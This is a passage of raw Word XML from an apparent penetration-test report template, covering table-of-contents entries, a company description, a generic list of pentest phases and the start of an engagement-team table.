                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48851372" w14:textId="6B057DA3"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9000" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation Likelihood Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178499000 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3447D5BB" w14:textId="5A793B47"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9001" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Business Impact Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178499001 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42DF2E31" w14:textId="7DBD773C" w:rsidR="008D468E" w:rsidRDefault="008D468E">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9002" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Remediation Difficulty Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178499002 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06FBDDAE" w14:textId="1AC5B674" w:rsidR="008D468E" w:rsidRDefault="008D468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9003" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">B- </w:t>
            </w:r>
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Resolution Status</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178499003 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07740174" w14:textId="36703C0A" w:rsidR="008D468E" w:rsidRDefault="008D468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9004" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C - Compromised Assets / Users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178499004 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08687D2F" w14:textId="6F667F95" w:rsidR="008D468E" w:rsidRDefault="008D468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8499005" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>D – Additional ENGAGEMENT INFORMATION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178499005 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="685300A8" w14:textId="2B9736D6" w:rsidR="006833CF" w:rsidRPr="006833CF" w:rsidRDefault="006833CF" w:rsidP="006833CF">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r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0967245D" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BFC4D1" w14:textId="2A52EC8F" w:rsidR="00B112BA" w:rsidRPr="00ED22DE" w:rsidRDefault="00643C1F" w:rsidP="00B112BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc178498947"/>
      <w:r w:rsidRPr="00ED22DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assessment</w:t>
      </w:r>
      <w:r w:rsidR="00F47B5B" w:rsidRPr="00ED22DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="30DF2A68" w14:textId="0210E637" w:rsidR="0035689D" w:rsidRPr="00ED22DE" w:rsidRDefault="00B112BA" w:rsidP="00B00916">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc178498948"/>
      <w:r w:rsidRPr="00ED22DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00291225" w:rsidRPr="00ED22DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>About Our Company</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="7D2BAC7A" w14:textId="228F3706" w:rsidR="0035689D" w:rsidRPr="0035689D" w:rsidRDefault="0035689D" w:rsidP="009E1F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xBugatti .Co</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a leading Penetration Testing as a Service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PTaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) platform which combines continuous automated scanning with on-demand manual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pentests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by security experts. Astra follows the highest standards for security testing, vulnerability scanning and is an active contributor to industry</w:t>
      </w:r>
      <w:r w:rsidR="009E1F48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">leading </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> security standards and tools (OWASP WSTG, OWASP ZAP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F84BBAF" w14:textId="77777777" w:rsidR="0035689D" w:rsidRPr="0035689D" w:rsidRDefault="0035689D" w:rsidP="0035689D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The assessment was performed within the predefined scope of this engagement, and its findings and recommendations have been shared with the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220E9AF" w14:textId="77777777" w:rsidR="0035689D" w:rsidRPr="0035689D" w:rsidRDefault="0035689D" w:rsidP="0035689D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>customer. A penetration test is considered a snapshot in time. The findings and recommendations solely reflect the information gathered during</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F60DE88" w14:textId="3DB7FEC3" w:rsidR="00291225" w:rsidRPr="00291225" w:rsidRDefault="0035689D" w:rsidP="0035689D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the assessment period and do not account for any subsequent changes or </w:t>
      </w:r>
      <w:r w:rsidR="00010BEF" w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="0035689D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B7BE00" w14:textId="089C8411" w:rsidR="00944C9D" w:rsidRPr="00ED22DE" w:rsidRDefault="00944C9D" w:rsidP="00B00916">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc178498949"/>
      <w:r w:rsidRPr="00ED22DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Phases of penetration testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="626E1277" w14:textId="264009C9" w:rsidR="00944C9D" w:rsidRPr="00C21279" w:rsidRDefault="00944C9D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Planning</w:t>
      </w:r>
      <w:r w:rsidR="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290CBB33" w14:textId="179C4E21" w:rsidR="00944C9D" w:rsidRPr="00F94101" w:rsidRDefault="00944C9D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94101">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Customer goals are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94101">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gathered</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94101">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and rules of engagement obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E10923" w14:textId="5C67020E" w:rsidR="00944C9D" w:rsidRPr="00C21279" w:rsidRDefault="00944C9D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
      <w:r w:rsidR="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68766712" w14:textId="6A75CE1F" w:rsidR="00944C9D" w:rsidRPr="00F94101" w:rsidRDefault="00944C9D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94101">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Perform scanning and enumeration to identify potential vulnerabilities, weak areas, and exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D703D" w14:textId="76C6BCBC" w:rsidR="00944C9D" w:rsidRPr="00C21279" w:rsidRDefault="00944C9D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r w:rsidR="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215D0BB0" w14:textId="018DC223" w:rsidR="00944C9D" w:rsidRPr="00F94101" w:rsidRDefault="00944C9D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94101">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Confirm potential vulnerabilities through exploitation and perform additional discovery upon new access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC0637" w14:textId="78D5DB71" w:rsidR="00944C9D" w:rsidRPr="00C21279" w:rsidRDefault="00944C9D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reporting</w:t>
      </w:r>
      <w:r w:rsidR="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF40F9" w14:textId="1DC410FA" w:rsidR="00877EC6" w:rsidRPr="00F94101" w:rsidRDefault="00944C9D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94101">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Document all found vulnerabilities and exploits, failed attempts, and company strengths and weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E80858F" w14:textId="77777777" w:rsidR="00877EC6" w:rsidRDefault="00877EC6" w:rsidP="00877EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0491B1F2" w14:textId="77777777" w:rsidR="00877EC6" w:rsidRDefault="00877EC6" w:rsidP="00877EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A361DE" w14:textId="77777777" w:rsidR="00877EC6" w:rsidRDefault="00877EC6" w:rsidP="00877EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334901E8" w14:textId="77777777" w:rsidR="00877EC6" w:rsidRDefault="00877EC6" w:rsidP="00877EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7553CC45" w14:textId="77777777" w:rsidR="00877EC6" w:rsidRDefault="00877EC6" w:rsidP="00877EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15960146" w14:textId="77777777" w:rsidR="00877EC6" w:rsidRDefault="00877EC6" w:rsidP="00877EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D00477C" w14:textId="0210E637" w:rsidR="00D377F0" w:rsidRPr="00C21279" w:rsidRDefault="00C21279" w:rsidP="00B00916">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc178498950"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED22DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Engagement Team</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable5Dark-Accent1"/>
        <w:tblW w:w="9402" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2350"/>
        <w:gridCol w:w="2350"/>
        <w:gridCol w:w="3035"/>
        <w:gridCol w:w="1667"/>
      </w:tblGrid>
      <w:tr w:rsidR="005473FC" w14:paraId="2852C6AA" w14:textId="77777777" w:rsidTr="00AD3007">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350" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FF0381B" w14:textId="50664570" w:rsidR="00F41C64" w:rsidRPr="00ED22DE" w:rsidRDefault="00ED22DE" w:rsidP="00D377F0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00F41C64" w:rsidRPr="00ED22DE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Name </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
